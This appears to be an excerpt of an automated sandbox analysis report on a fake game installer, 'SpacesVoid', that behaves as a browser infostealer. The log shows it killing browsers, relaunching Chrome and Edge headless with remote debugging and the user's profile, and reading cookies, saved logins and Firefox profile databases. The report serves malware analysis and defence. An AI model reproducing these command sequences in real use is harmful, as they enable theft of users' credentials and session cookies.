Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F

Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe "c:\users\user\appdata\local\programs\unrealgame\spacesvoid.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\unrealgame" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1728 --field-trial-handle=1732,i,2577388129059311954,1337819537177688922,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe "c:\users\user\appdata\local\programs\unrealgame\spacesvoid.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\unrealgame" --mojo-platform-channel-handle=2416 --field-trial-handle=1732,i,2577388129059311954,1337819537177688922,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "c:/program files/google/chrome/application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=c:\users\user\appdata\local\google\chrome\user data" --profile-directory=default --window-position=-32000,-32000 --headless https://mail.google.com
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "c:/program files (x86)/microsoft/edge/application/msedge.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=c:\users\user\appdata\local\microsoft\edge\user data" --profile-directory=default --window-position=-32000,-32000 --headless https://mail.google.com
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe "c:\users\user\appdata\local\programs\unrealgame\spacesvoid.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\unrealgame" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1728 --field-trial-handle=1732,i,2577388129059311954,1337819537177688922,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe "c:\users\user\appdata\local\programs\unrealgame\spacesvoid.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\unrealgame" --mojo-platform-channel-handle=2416 --field-trial-handle=1732,i,2577388129059311954,1337819537177688922,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "c:/program files/google/chrome/application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=c:\users\user\appdata\local\google\chrome\user data" --profile-directory=default --window-position=-32000,-32000 --headless https://mail.google.com
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "c:/program files (x86)/microsoft/edge/application/msedge.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=c:\users\user\appdata\local\microsoft\edge\user data" --profile-directory=default --window-position=-32000,-32000 --headless https://mail.google.com

Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007470000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: ..\..\third_party\webrtc\modules\desktop_capture\win\window_capture_utils.ccFail to create instance of VirtualDesktopManagerChrome_WidgetWin_Progman..\..\third_party\webrtc\modules\desktop_capture\cropping_window_capturer.ccWindow no longer on top when ScreenCapturer finishesScreenCapturer failed to capture a frameWindow rect is emptyWindow is outside of the captured displaySysShadowWebRTC.DesktopCapture.Win.WindowGdiCapturerFrameTimeWindowCapturerWinGdi::CaptureFrame..\..\third_party\webrtc\modules\desktop_capture\win\window_capturer_win_gdi.ccWindow hasn't been selected: Target window has been closed.Failed to get drawable window area: Failed to get window DC: Failed to create frame.Both PrintWindow() and BitBlt() failed.Capturing owned window failed (previous error/warning pertained to that)WebRTC.DesktopCapture.BlankFrameDetectedWebRTC.DesktopCapture.PrimaryCapturerSelectSourceErrorWebRTC.DesktopCapture.PrimaryCapturerErrorWebRTC.DesktopCapture.PrimaryCapturerPermanentErrordwmapi.dllDwmEnableCompositionScreenCapturerWinGdi::CaptureFrame..\..\third_party\webrtc\modules\desktop_capture\win\screen_capturer_win_gdi.ccFailed to capture screen by GDI.WebRTC.DesktopCapture.Win.ScreenGdiCapturerFrameTimedesktop_dc_memory_dc_Failed to get screen rect.Failed to create frame buffer.Failed to select current bitmap into memery dc.BitBlt failed..\..\third_party\webrtc\modules\desktop_capture\win\cursor.ccCreateMouseCursorFromHCursorUnable to get cursor icon info. Error = Unable to get bitmap info. Error = Unable to get bitmap bits. Error = `

Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\sqlite3\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\sqlite3\lib\sqlite3.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\sqlite3\lib\sqlite3-binding.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\ilovingcats\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\ilovingcats\dist\index.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\ilovingcats\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\passwords.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Program Files\Google\Chrome\Application\chrome.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\Chrome-Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\Chrome-Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\Chrome-Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\Chrome-Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\Edge-Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\Edge-Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\Edge-Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\user-cookies-fixed.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\user-cookies-fixed.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite VolumeInformation	Jump to behavior
